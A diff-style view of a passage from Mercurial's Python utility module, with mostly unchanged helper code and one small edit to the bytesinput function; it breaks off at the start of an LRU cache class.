108 gethgcmd = platform.gethgcmd
108 gethgcmd = platform.gethgcmd
109 getuser = platform.getuser
109 getuser = platform.getuser
110 getpid = os.getpid
110 getpid = os.getpid
111 groupmembers = platform.groupmembers
111 groupmembers = platform.groupmembers
112 groupname = platform.groupname
112 groupname = platform.groupname
113 hidewindow = platform.hidewindow
113 hidewindow = platform.hidewindow
114 isexec = platform.isexec
114 isexec = platform.isexec
115 isowner = platform.isowner
115 isowner = platform.isowner
116 listdir = osutil.listdir
116 listdir = osutil.listdir
117 localpath = platform.localpath
117 localpath = platform.localpath
118 lookupreg = platform.lookupreg
118 lookupreg = platform.lookupreg
119 makedir = platform.makedir
119 makedir = platform.makedir
120 nlinks = platform.nlinks
120 nlinks = platform.nlinks
121 normpath = platform.normpath
121 normpath = platform.normpath
122 normcase = platform.normcase
122 normcase = platform.normcase
123 normcasespec = platform.normcasespec
123 normcasespec = platform.normcasespec
124 normcasefallback = platform.normcasefallback
124 normcasefallback = platform.normcasefallback
125 openhardlinks = platform.openhardlinks
125 openhardlinks = platform.openhardlinks
126 oslink = platform.oslink
126 oslink = platform.oslink
127 parsepatchoutput = platform.parsepatchoutput
127 parsepatchoutput = platform.parsepatchoutput
128 pconvert = platform.pconvert
128 pconvert = platform.pconvert
129 poll = platform.poll
129 poll = platform.poll
130 popen = platform.popen
130 popen = platform.popen
131 posixfile = platform.posixfile
131 posixfile = platform.posixfile
132 quotecommand = platform.quotecommand
132 quotecommand = platform.quotecommand
133 readpipe = platform.readpipe
133 readpipe = platform.readpipe
134 rename = platform.rename
134 rename = platform.rename
135 removedirs = platform.removedirs
135 removedirs = platform.removedirs
136 samedevice = platform.samedevice
136 samedevice = platform.samedevice
137 samefile = platform.samefile
137 samefile = platform.samefile
138 samestat = platform.samestat
138 samestat = platform.samestat
139 setbinary = platform.setbinary
139 setbinary = platform.setbinary
140 setflags = platform.setflags
140 setflags = platform.setflags
141 setsignalhandler = platform.setsignalhandler
141 setsignalhandler = platform.setsignalhandler
142 shellquote = platform.shellquote
142 shellquote = platform.shellquote
143 spawndetached = platform.spawndetached
143 spawndetached = platform.spawndetached
144 split = platform.split
144 split = platform.split
145 sshargs = platform.sshargs
145 sshargs = platform.sshargs
146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 statisexec = platform.statisexec
147 statisexec = platform.statisexec
148 statislink = platform.statislink
148 statislink = platform.statislink
149 testpid = platform.testpid
149 testpid = platform.testpid
150 umask = platform.umask
150 umask = platform.umask
151 unlink = platform.unlink
151 unlink = platform.unlink
152 username = platform.username
152 username = platform.username
153
153
154 try:
154 try:
155 recvfds = osutil.recvfds
155 recvfds = osutil.recvfds
156 except AttributeError:
156 except AttributeError:
157 pass
157 pass
158 try:
158 try:
159 setprocname = osutil.setprocname
159 setprocname = osutil.setprocname
160 except AttributeError:
160 except AttributeError:
161 pass
161 pass
162
162
163 # Python compatibility
163 # Python compatibility
164
164
165 _notset = object()
165 _notset = object()
166
166
167 # disable Python's problematic floating point timestamps (issue4836)
167 # disable Python's problematic floating point timestamps (issue4836)
168 # (Python hypocritically says you shouldn't change this behavior in
168 # (Python hypocritically says you shouldn't change this behavior in
169 # libraries, and sure enough Mercurial is not a library.)
169 # libraries, and sure enough Mercurial is not a library.)
170 os.stat_float_times(False)
170 os.stat_float_times(False)
171
171
172 def safehasattr(thing, attr):
172 def safehasattr(thing, attr):
173 return getattr(thing, attr, _notset) is not _notset
173 return getattr(thing, attr, _notset) is not _notset
174
174
175 def bytesinput(fin, fout, *args, **kwargs):
175 def bytesinput(fin, fout, *args, **kwargs):
176 sin, sout = sys.stdin, sys.stdout
176 sin, sout = sys.stdin, sys.stdout
177 try:
177 try:
178 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
178 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
179 if pycompat.ispy3:
179 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
180 return encoding.strtolocal(input(*args, **kwargs))
181 else:
182 return raw_input(*args, **kwargs)
183 finally:
180 finally:
184 sys.stdin, sys.stdout = sin, sout
181 sys.stdin, sys.stdout = sin, sout
185
182
186 def bitsfrom(container):
183 def bitsfrom(container):
187 bits = 0
184 bits = 0
188 for bit in container:
185 for bit in container:
189 bits |= bit
186 bits |= bit
190 return bits
187 return bits
191
188
192 # python 2.6 still have deprecation warning enabled by default. We do not want
189 # python 2.6 still have deprecation warning enabled by default. We do not want
193 # to display anything to standard user so detect if we are running test and
190 # to display anything to standard user so detect if we are running test and
194 # only use python deprecation warning in this case.
191 # only use python deprecation warning in this case.
195 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
192 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
196 if _dowarn:
193 if _dowarn:
197 # explicitly unfilter our warning for python 2.7
194 # explicitly unfilter our warning for python 2.7
198 #
195 #
199 # The option of setting PYTHONWARNINGS in the test runner was investigated.
196 # The option of setting PYTHONWARNINGS in the test runner was investigated.
200 # However, module name set through PYTHONWARNINGS was exactly matched, so
197 # However, module name set through PYTHONWARNINGS was exactly matched, so
201 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
198 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
202 # makes the whole PYTHONWARNINGS thing useless for our usecase.
199 # makes the whole PYTHONWARNINGS thing useless for our usecase.
203 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
200 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
204 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
201 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
205 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
202 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
206
203
207 def nouideprecwarn(msg, version, stacklevel=1):
204 def nouideprecwarn(msg, version, stacklevel=1):
208 """Issue an python native deprecation warning
205 """Issue an python native deprecation warning
209
206
210 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
207 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
211 """
208 """
212 if _dowarn:
209 if _dowarn:
213 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
210 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
214 " update your code.)") % version
211 " update your code.)") % version
215 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
212 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
216
213
217 DIGESTS = {
214 DIGESTS = {
218 'md5': hashlib.md5,
215 'md5': hashlib.md5,
219 'sha1': hashlib.sha1,
216 'sha1': hashlib.sha1,
220 'sha512': hashlib.sha512,
217 'sha512': hashlib.sha512,
221 }
218 }
222 # List of digest types from strongest to weakest
219 # List of digest types from strongest to weakest
223 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
220 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
224
221
225 for k in DIGESTS_BY_STRENGTH:
222 for k in DIGESTS_BY_STRENGTH:
226 assert k in DIGESTS
223 assert k in DIGESTS
227
224
228 class digester(object):
225 class digester(object):
229 """helper to compute digests.
226 """helper to compute digests.
230
227
231 This helper can be used to compute one or more digests given their name.
228 This helper can be used to compute one or more digests given their name.
232
229
233 >>> d = digester(['md5', 'sha1'])
230 >>> d = digester(['md5', 'sha1'])
234 >>> d.update('foo')
231 >>> d.update('foo')
235 >>> [k for k in sorted(d)]
232 >>> [k for k in sorted(d)]
236 ['md5', 'sha1']
233 ['md5', 'sha1']
237 >>> d['md5']
234 >>> d['md5']
238 'acbd18db4cc2f85cedef654fccc4a4d8'
235 'acbd18db4cc2f85cedef654fccc4a4d8'
239 >>> d['sha1']
236 >>> d['sha1']
240 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
237 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
241 >>> digester.preferred(['md5', 'sha1'])
238 >>> digester.preferred(['md5', 'sha1'])
242 'sha1'
239 'sha1'
243 """
240 """
244
241
245 def __init__(self, digests, s=''):
242 def __init__(self, digests, s=''):
246 self._hashes = {}
243 self._hashes = {}
247 for k in digests:
244 for k in digests:
248 if k not in DIGESTS:
245 if k not in DIGESTS:
249 raise Abort(_('unknown digest type: %s') % k)
246 raise Abort(_('unknown digest type: %s') % k)
250 self._hashes[k] = DIGESTS[k]()
247 self._hashes[k] = DIGESTS[k]()
251 if s:
248 if s:
252 self.update(s)
249 self.update(s)
253
250
254 def update(self, data):
251 def update(self, data):
255 for h in self._hashes.values():
252 for h in self._hashes.values():
256 h.update(data)
253 h.update(data)
257
254
258 def __getitem__(self, key):
255 def __getitem__(self, key):
259 if key not in DIGESTS:
256 if key not in DIGESTS:
260 raise Abort(_('unknown digest type: %s') % k)
257 raise Abort(_('unknown digest type: %s') % k)
261 return self._hashes[key].hexdigest()
258 return self._hashes[key].hexdigest()
262
259
263 def __iter__(self):
260 def __iter__(self):
264 return iter(self._hashes)
261 return iter(self._hashes)
265
262
266 @staticmethod
263 @staticmethod
267 def preferred(supported):
264 def preferred(supported):
268 """returns the strongest digest type in both supported and DIGESTS."""
265 """returns the strongest digest type in both supported and DIGESTS."""
269
266
270 for k in DIGESTS_BY_STRENGTH:
267 for k in DIGESTS_BY_STRENGTH:
271 if k in supported:
268 if k in supported:
272 return k
269 return k
273 return None
270 return None
274
271
275 class digestchecker(object):
272 class digestchecker(object):
276 """file handle wrapper that additionally checks content against a given
273 """file handle wrapper that additionally checks content against a given
277 size and digests.
274 size and digests.
278
275
279 d = digestchecker(fh, size, {'md5': '...'})
276 d = digestchecker(fh, size, {'md5': '...'})
280
277
281 When multiple digests are given, all of them are validated.
278 When multiple digests are given, all of them are validated.
282 """
279 """
283
280
284 def __init__(self, fh, size, digests):
281 def __init__(self, fh, size, digests):
285 self._fh = fh
282 self._fh = fh
286 self._size = size
283 self._size = size
287 self._got = 0
284 self._got = 0
288 self._digests = dict(digests)
285 self._digests = dict(digests)
289 self._digester = digester(self._digests.keys())
286 self._digester = digester(self._digests.keys())
290
287
291 def read(self, length=-1):
288 def read(self, length=-1):
292 content = self._fh.read(length)
289 content = self._fh.read(length)
293 self._digester.update(content)
290 self._digester.update(content)
294 self._got += len(content)
291 self._got += len(content)
295 return content
292 return content
296
293
297 def validate(self):
294 def validate(self):
298 if self._size != self._got:
295 if self._size != self._got:
299 raise Abort(_('size mismatch: expected %d, got %d') %
296 raise Abort(_('size mismatch: expected %d, got %d') %
300 (self._size, self._got))
297 (self._size, self._got))
301 for k, v in self._digests.items():
298 for k, v in self._digests.items():
302 if v != self._digester[k]:
299 if v != self._digester[k]:
303 # i18n: first parameter is a digest name
300 # i18n: first parameter is a digest name
304 raise Abort(_('%s mismatch: expected %s, got %s') %
301 raise Abort(_('%s mismatch: expected %s, got %s') %
305 (k, v, self._digester[k]))
302 (k, v, self._digester[k]))
306
303
307 try:
304 try:
308 buffer = buffer
305 buffer = buffer
309 except NameError:
306 except NameError:
310 def buffer(sliceable, offset=0, length=None):
307 def buffer(sliceable, offset=0, length=None):
311 if length is not None:
308 if length is not None:
312 return memoryview(sliceable)[offset:offset + length]
309 return memoryview(sliceable)[offset:offset + length]
313 return memoryview(sliceable)[offset:]
310 return memoryview(sliceable)[offset:]
314
311
315 closefds = pycompat.osname == 'posix'
312 closefds = pycompat.osname == 'posix'
316
313
317 _chunksize = 4096
314 _chunksize = 4096
318
315
319 class bufferedinputpipe(object):
316 class bufferedinputpipe(object):
320 """a manually buffered input pipe
317 """a manually buffered input pipe
321
318
322 Python will not let us use buffered IO and lazy reading with 'polling' at
319 Python will not let us use buffered IO and lazy reading with 'polling' at
323 the same time. We cannot probe the buffer state and select will not detect
320 the same time. We cannot probe the buffer state and select will not detect
324 that data are ready to read if they are already buffered.
321 that data are ready to read if they are already buffered.
325
322
326 This class let us work around that by implementing its own buffering
323 This class let us work around that by implementing its own buffering
327 (allowing efficient readline) while offering a way to know if the buffer is
324 (allowing efficient readline) while offering a way to know if the buffer is
328 empty from the output (allowing collaboration of the buffer with polling).
325 empty from the output (allowing collaboration of the buffer with polling).
329
326
330 This class lives in the 'util' module because it makes use of the 'os'
327 This class lives in the 'util' module because it makes use of the 'os'
331 module from the python stdlib.
328 module from the python stdlib.
332 """
329 """
333
330
334 def __init__(self, input):
331 def __init__(self, input):
335 self._input = input
332 self._input = input
336 self._buffer = []
333 self._buffer = []
337 self._eof = False
334 self._eof = False
338 self._lenbuf = 0
335 self._lenbuf = 0
339
336
340 @property
337 @property
341 def hasbuffer(self):
338 def hasbuffer(self):
342 """True is any data is currently buffered
339 """True is any data is currently buffered
343
340
344 This will be used externally a pre-step for polling IO. If there is
341 This will be used externally a pre-step for polling IO. If there is
345 already data then no polling should be set in place."""
342 already data then no polling should be set in place."""
346 return bool(self._buffer)
343 return bool(self._buffer)
347
344
348 @property
345 @property
349 def closed(self):
346 def closed(self):
350 return self._input.closed
347 return self._input.closed
351
348
352 def fileno(self):
349 def fileno(self):
353 return self._input.fileno()
350 return self._input.fileno()
354
351
355 def close(self):
352 def close(self):
356 return self._input.close()
353 return self._input.close()
357
354
358 def read(self, size):
355 def read(self, size):
359 while (not self._eof) and (self._lenbuf < size):
356 while (not self._eof) and (self._lenbuf < size):
360 self._fillbuffer()
357 self._fillbuffer()
361 return self._frombuffer(size)
358 return self._frombuffer(size)
362
359
363 def readline(self, *args, **kwargs):
360 def readline(self, *args, **kwargs):
364 if 1 < len(self._buffer):
361 if 1 < len(self._buffer):
365 # this should not happen because both read and readline end with a
362 # this should not happen because both read and readline end with a
366 # _frombuffer call that collapse it.
363 # _frombuffer call that collapse it.
367 self._buffer = [''.join(self._buffer)]
364 self._buffer = [''.join(self._buffer)]
368 self._lenbuf = len(self._buffer[0])
365 self._lenbuf = len(self._buffer[0])
369 lfi = -1
366 lfi = -1
370 if self._buffer:
367 if self._buffer:
371 lfi = self._buffer[-1].find('\n')
368 lfi = self._buffer[-1].find('\n')
372 while (not self._eof) and lfi < 0:
369 while (not self._eof) and lfi < 0:
373 self._fillbuffer()
370 self._fillbuffer()
374 if self._buffer:
371 if self._buffer:
375 lfi = self._buffer[-1].find('\n')
372 lfi = self._buffer[-1].find('\n')
376 size = lfi + 1
373 size = lfi + 1
377 if lfi < 0: # end of file
374 if lfi < 0: # end of file
378 size = self._lenbuf
375 size = self._lenbuf
379 elif 1 < len(self._buffer):
376 elif 1 < len(self._buffer):
380 # we need to take previous chunks into account
377 # we need to take previous chunks into account
381 size += self._lenbuf - len(self._buffer[-1])
378 size += self._lenbuf - len(self._buffer[-1])
382 return self._frombuffer(size)
379 return self._frombuffer(size)
383
380
384 def _frombuffer(self, size):
381 def _frombuffer(self, size):
385 """return at most 'size' data from the buffer
382 """return at most 'size' data from the buffer
386
383
387 The data are removed from the buffer."""
384 The data are removed from the buffer."""
388 if size == 0 or not self._buffer:
385 if size == 0 or not self._buffer:
389 return ''
386 return ''
390 buf = self._buffer[0]
387 buf = self._buffer[0]
391 if 1 < len(self._buffer):
388 if 1 < len(self._buffer):
392 buf = ''.join(self._buffer)
389 buf = ''.join(self._buffer)
393
390
394 data = buf[:size]
391 data = buf[:size]
395 buf = buf[len(data):]
392 buf = buf[len(data):]
396 if buf:
393 if buf:
397 self._buffer = [buf]
394 self._buffer = [buf]
398 self._lenbuf = len(buf)
395 self._lenbuf = len(buf)
399 else:
396 else:
400 self._buffer = []
397 self._buffer = []
401 self._lenbuf = 0
398 self._lenbuf = 0
402 return data
399 return data
403
400
404 def _fillbuffer(self):
401 def _fillbuffer(self):
405 """read data to the buffer"""
402 """read data to the buffer"""
406 data = os.read(self._input.fileno(), _chunksize)
403 data = os.read(self._input.fileno(), _chunksize)
407 if not data:
404 if not data:
408 self._eof = True
405 self._eof = True
409 else:
406 else:
410 self._lenbuf += len(data)
407 self._lenbuf += len(data)
411 self._buffer.append(data)
408 self._buffer.append(data)
412
409
413 def popen2(cmd, env=None, newlines=False):
410 def popen2(cmd, env=None, newlines=False):
414 # Setting bufsize to -1 lets the system decide the buffer size.
411 # Setting bufsize to -1 lets the system decide the buffer size.
415 # The default for bufsize is 0, meaning unbuffered. This leads to
412 # The default for bufsize is 0, meaning unbuffered. This leads to
416 # poor performance on Mac OS X: http://bugs.python.org/issue4194
413 # poor performance on Mac OS X: http://bugs.python.org/issue4194
417 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
414 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
418 close_fds=closefds,
415 close_fds=closefds,
419 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
416 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
420 universal_newlines=newlines,
417 universal_newlines=newlines,
421 env=env)
418 env=env)
422 return p.stdin, p.stdout
419 return p.stdin, p.stdout
423
420
424 def popen3(cmd, env=None, newlines=False):
421 def popen3(cmd, env=None, newlines=False):
425 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
422 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
426 return stdin, stdout, stderr
423 return stdin, stdout, stderr
427
424
428 def popen4(cmd, env=None, newlines=False, bufsize=-1):
425 def popen4(cmd, env=None, newlines=False, bufsize=-1):
429 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
426 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
430 close_fds=closefds,
427 close_fds=closefds,
431 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
428 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
432 stderr=subprocess.PIPE,
429 stderr=subprocess.PIPE,
433 universal_newlines=newlines,
430 universal_newlines=newlines,
434 env=env)
431 env=env)
435 return p.stdin, p.stdout, p.stderr, p
432 return p.stdin, p.stdout, p.stderr, p
436
433
437 def version():
434 def version():
438 """Return version information if available."""
435 """Return version information if available."""
439 try:
436 try:
440 from . import __version__
437 from . import __version__
441 return __version__.version
438 return __version__.version
442 except ImportError:
439 except ImportError:
443 return 'unknown'
440 return 'unknown'
444
441
445 def versiontuple(v=None, n=4):
442 def versiontuple(v=None, n=4):
446 """Parses a Mercurial version string into an N-tuple.
443 """Parses a Mercurial version string into an N-tuple.
447
444
448 The version string to be parsed is specified with the ``v`` argument.
445 The version string to be parsed is specified with the ``v`` argument.
449 If it isn't defined, the current Mercurial version string will be parsed.
446 If it isn't defined, the current Mercurial version string will be parsed.
450
447
451 ``n`` can be 2, 3, or 4. Here is how some version strings map to
448 ``n`` can be 2, 3, or 4. Here is how some version strings map to
452 returned values:
449 returned values:
453
450
454 >>> v = '3.6.1+190-df9b73d2d444'
451 >>> v = '3.6.1+190-df9b73d2d444'
455 >>> versiontuple(v, 2)
452 >>> versiontuple(v, 2)
456 (3, 6)
453 (3, 6)
457 >>> versiontuple(v, 3)
454 >>> versiontuple(v, 3)
458 (3, 6, 1)
455 (3, 6, 1)
459 >>> versiontuple(v, 4)
456 >>> versiontuple(v, 4)
460 (3, 6, 1, '190-df9b73d2d444')
457 (3, 6, 1, '190-df9b73d2d444')
461
458
462 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
459 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
463 (3, 6, 1, '190-df9b73d2d444+20151118')
460 (3, 6, 1, '190-df9b73d2d444+20151118')
464
461
465 >>> v = '3.6'
462 >>> v = '3.6'
466 >>> versiontuple(v, 2)
463 >>> versiontuple(v, 2)
467 (3, 6)
464 (3, 6)
468 >>> versiontuple(v, 3)
465 >>> versiontuple(v, 3)
469 (3, 6, None)
466 (3, 6, None)
470 >>> versiontuple(v, 4)
467 >>> versiontuple(v, 4)
471 (3, 6, None, None)
468 (3, 6, None, None)
472
469
473 >>> v = '3.9-rc'
470 >>> v = '3.9-rc'
474 >>> versiontuple(v, 2)
471 >>> versiontuple(v, 2)
475 (3, 9)
472 (3, 9)
476 >>> versiontuple(v, 3)
473 >>> versiontuple(v, 3)
477 (3, 9, None)
474 (3, 9, None)
478 >>> versiontuple(v, 4)
475 >>> versiontuple(v, 4)
479 (3, 9, None, 'rc')
476 (3, 9, None, 'rc')
480
477
481 >>> v = '3.9-rc+2-02a8fea4289b'
478 >>> v = '3.9-rc+2-02a8fea4289b'
482 >>> versiontuple(v, 2)
479 >>> versiontuple(v, 2)
483 (3, 9)
480 (3, 9)
484 >>> versiontuple(v, 3)
481 >>> versiontuple(v, 3)
485 (3, 9, None)
482 (3, 9, None)
486 >>> versiontuple(v, 4)
483 >>> versiontuple(v, 4)
487 (3, 9, None, 'rc+2-02a8fea4289b')
484 (3, 9, None, 'rc+2-02a8fea4289b')
488 """
485 """
489 if not v:
486 if not v:
490 v = version()
487 v = version()
491 parts = remod.split('[\+-]', v, 1)
488 parts = remod.split('[\+-]', v, 1)
492 if len(parts) == 1:
489 if len(parts) == 1:
493 vparts, extra = parts[0], None
490 vparts, extra = parts[0], None
494 else:
491 else:
495 vparts, extra = parts
492 vparts, extra = parts
496
493
497 vints = []
494 vints = []
498 for i in vparts.split('.'):
495 for i in vparts.split('.'):
499 try:
496 try:
500 vints.append(int(i))
497 vints.append(int(i))
501 except ValueError:
498 except ValueError:
502 break
499 break
503 # (3, 6) -> (3, 6, None)
500 # (3, 6) -> (3, 6, None)
504 while len(vints) < 3:
501 while len(vints) < 3:
505 vints.append(None)
502 vints.append(None)
506
503
507 if n == 2:
504 if n == 2:
508 return (vints[0], vints[1])
505 return (vints[0], vints[1])
509 if n == 3:
506 if n == 3:
510 return (vints[0], vints[1], vints[2])
507 return (vints[0], vints[1], vints[2])
511 if n == 4:
508 if n == 4:
512 return (vints[0], vints[1], vints[2], extra)
509 return (vints[0], vints[1], vints[2], extra)
513
510
514 # used by parsedate
511 # used by parsedate
515 defaultdateformats = (
512 defaultdateformats = (
516 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
513 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
517 '%Y-%m-%dT%H:%M', # without seconds
514 '%Y-%m-%dT%H:%M', # without seconds
518 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
515 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
519 '%Y-%m-%dT%H%M', # without seconds
516 '%Y-%m-%dT%H%M', # without seconds
520 '%Y-%m-%d %H:%M:%S', # our common legal variant
517 '%Y-%m-%d %H:%M:%S', # our common legal variant
521 '%Y-%m-%d %H:%M', # without seconds
518 '%Y-%m-%d %H:%M', # without seconds
522 '%Y-%m-%d %H%M%S', # without :
519 '%Y-%m-%d %H%M%S', # without :
523 '%Y-%m-%d %H%M', # without seconds
520 '%Y-%m-%d %H%M', # without seconds
524 '%Y-%m-%d %I:%M:%S%p',
521 '%Y-%m-%d %I:%M:%S%p',
525 '%Y-%m-%d %H:%M',
522 '%Y-%m-%d %H:%M',
526 '%Y-%m-%d %I:%M%p',
523 '%Y-%m-%d %I:%M%p',
527 '%Y-%m-%d',
524 '%Y-%m-%d',
528 '%m-%d',
525 '%m-%d',
529 '%m/%d',
526 '%m/%d',
530 '%m/%d/%y',
527 '%m/%d/%y',
531 '%m/%d/%Y',
528 '%m/%d/%Y',
532 '%a %b %d %H:%M:%S %Y',
529 '%a %b %d %H:%M:%S %Y',
533 '%a %b %d %I:%M:%S%p %Y',
530 '%a %b %d %I:%M:%S%p %Y',
534 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
531 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
535 '%b %d %H:%M:%S %Y',
532 '%b %d %H:%M:%S %Y',
536 '%b %d %I:%M:%S%p %Y',
533 '%b %d %I:%M:%S%p %Y',
537 '%b %d %H:%M:%S',
534 '%b %d %H:%M:%S',
538 '%b %d %I:%M:%S%p',
535 '%b %d %I:%M:%S%p',
539 '%b %d %H:%M',
536 '%b %d %H:%M',
540 '%b %d %I:%M%p',
537 '%b %d %I:%M%p',
541 '%b %d %Y',
538 '%b %d %Y',
542 '%b %d',
539 '%b %d',
543 '%H:%M:%S',
540 '%H:%M:%S',
544 '%I:%M:%S%p',
541 '%I:%M:%S%p',
545 '%H:%M',
542 '%H:%M',
546 '%I:%M%p',
543 '%I:%M%p',
547 )
544 )
548
545
549 extendeddateformats = defaultdateformats + (
546 extendeddateformats = defaultdateformats + (
550 "%Y",
547 "%Y",
551 "%Y-%m",
548 "%Y-%m",
552 "%b",
549 "%b",
553 "%b %Y",
550 "%b %Y",
554 )
551 )
555
552
556 def cachefunc(func):
553 def cachefunc(func):
557 '''cache the result of function calls'''
554 '''cache the result of function calls'''
558 # XXX doesn't handle keywords args
555 # XXX doesn't handle keywords args
559 if func.__code__.co_argcount == 0:
556 if func.__code__.co_argcount == 0:
560 cache = []
557 cache = []
561 def f():
558 def f():
562 if len(cache) == 0:
559 if len(cache) == 0:
563 cache.append(func())
560 cache.append(func())
564 return cache[0]
561 return cache[0]
565 return f
562 return f
566 cache = {}
563 cache = {}
567 if func.__code__.co_argcount == 1:
564 if func.__code__.co_argcount == 1:
568 # we gain a small amount of time because
565 # we gain a small amount of time because
569 # we don't need to pack/unpack the list
566 # we don't need to pack/unpack the list
570 def f(arg):
567 def f(arg):
571 if arg not in cache:
568 if arg not in cache:
572 cache[arg] = func(arg)
569 cache[arg] = func(arg)
573 return cache[arg]
570 return cache[arg]
574 else:
571 else:
575 def f(*args):
572 def f(*args):
576 if args not in cache:
573 if args not in cache:
577 cache[args] = func(*args)
574 cache[args] = func(*args)
578 return cache[args]
575 return cache[args]
579
576
580 return f
577 return f
581
578
582 class sortdict(collections.OrderedDict):
579 class sortdict(collections.OrderedDict):
583 '''a simple sorted dictionary
580 '''a simple sorted dictionary
584
581
585 >>> d1 = sortdict([('a', 0), ('b', 1)])
582 >>> d1 = sortdict([('a', 0), ('b', 1)])
586 >>> d2 = d1.copy()
583 >>> d2 = d1.copy()
587 >>> d2
584 >>> d2
588 sortdict([('a', 0), ('b', 1)])
585 sortdict([('a', 0), ('b', 1)])
589 >>> d2.update([('a', 2)])
586 >>> d2.update([('a', 2)])
590 >>> d2.keys() # should still be in last-set order
587 >>> d2.keys() # should still be in last-set order
591 ['b', 'a']
588 ['b', 'a']
592 '''
589 '''
593
590
594 def __setitem__(self, key, value):
591 def __setitem__(self, key, value):
595 if key in self:
592 if key in self:
596 del self[key]
593 del self[key]
597 super(sortdict, self).__setitem__(key, value)
594 super(sortdict, self).__setitem__(key, value)
598
595
599 if pycompat.ispypy:
596 if pycompat.ispypy:
600 # __setitem__() isn't called as of PyPy 5.8.0
597 # __setitem__() isn't called as of PyPy 5.8.0
601 def update(self, src):
598 def update(self, src):
602 if isinstance(src, dict):
599 if isinstance(src, dict):
603 src = src.iteritems()
600 src = src.iteritems()
604 for k, v in src:
601 for k, v in src:
605 self[k] = v
602 self[k] = v
606
603
607 class transactional(object):
604 class transactional(object):
608 """Base class for making a transactional type into a context manager."""
605 """Base class for making a transactional type into a context manager."""
609 __metaclass__ = abc.ABCMeta
606 __metaclass__ = abc.ABCMeta
610
607
611 @abc.abstractmethod
608 @abc.abstractmethod
612 def close(self):
609 def close(self):
613 """Successfully closes the transaction."""
610 """Successfully closes the transaction."""
614
611
615 @abc.abstractmethod
612 @abc.abstractmethod
616 def release(self):
613 def release(self):
617 """Marks the end of the transaction.
614 """Marks the end of the transaction.
618
615
619 If the transaction has not been closed, it will be aborted.
616 If the transaction has not been closed, it will be aborted.
620 """
617 """
621
618
622 def __enter__(self):
619 def __enter__(self):
623 return self
620 return self
624
621
625 def __exit__(self, exc_type, exc_val, exc_tb):
622 def __exit__(self, exc_type, exc_val, exc_tb):
626 try:
623 try:
627 if exc_type is None:
624 if exc_type is None:
628 self.close()
625 self.close()
629 finally:
626 finally:
630 self.release()
627 self.release()
631
628
632 @contextlib.contextmanager
629 @contextlib.contextmanager
633 def acceptintervention(tr=None):
630 def acceptintervention(tr=None):
634 """A context manager that closes the transaction on InterventionRequired
631 """A context manager that closes the transaction on InterventionRequired
635
632
636 If no transaction was provided, this simply runs the body and returns
633 If no transaction was provided, this simply runs the body and returns
637 """
634 """
638 if not tr:
635 if not tr:
639 yield
636 yield
640 return
637 return
641 try:
638 try:
642 yield
639 yield
643 tr.close()
640 tr.close()
644 except error.InterventionRequired:
641 except error.InterventionRequired:
645 tr.close()
642 tr.close()
646 raise
643 raise
647 finally:
644 finally:
648 tr.release()
645 tr.release()
649
646
650 @contextlib.contextmanager
647 @contextlib.contextmanager
651 def nullcontextmanager():
648 def nullcontextmanager():
652 yield
649 yield
653
650
654 class _lrucachenode(object):
651 class _lrucachenode(object):
655 """A node in a doubly linked list.
652 """A node in a doubly linked list.
656
653
657 Holds a reference to nodes on either side as well as a key-value
654 Holds a reference to nodes on either side as well as a key-value
658 pair for the dictionary entry.
655 pair for the dictionary entry.
659 """
656 """
660 __slots__ = (u'next', u'prev', u'key', u'value')
657 __slots__ = (u'next', u'prev', u'key', u'value')
661
658
662 def __init__(self):
659 def __init__(self):
663 self.next = None
660 self.next = None
664 self.prev = None
661 self.prev = None
665
662
666 self.key = _notset
663 self.key = _notset
667 self.value = None
664 self.value = None
668
665
669 def markempty(self):
666 def markempty(self):
670 """Mark the node as emptied."""
667 """Mark the node as emptied."""
671 self.key = _notset
668 self.key = _notset
672
669
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        self._cache = {}

        # Start with a single self-linked node; more nodes are added
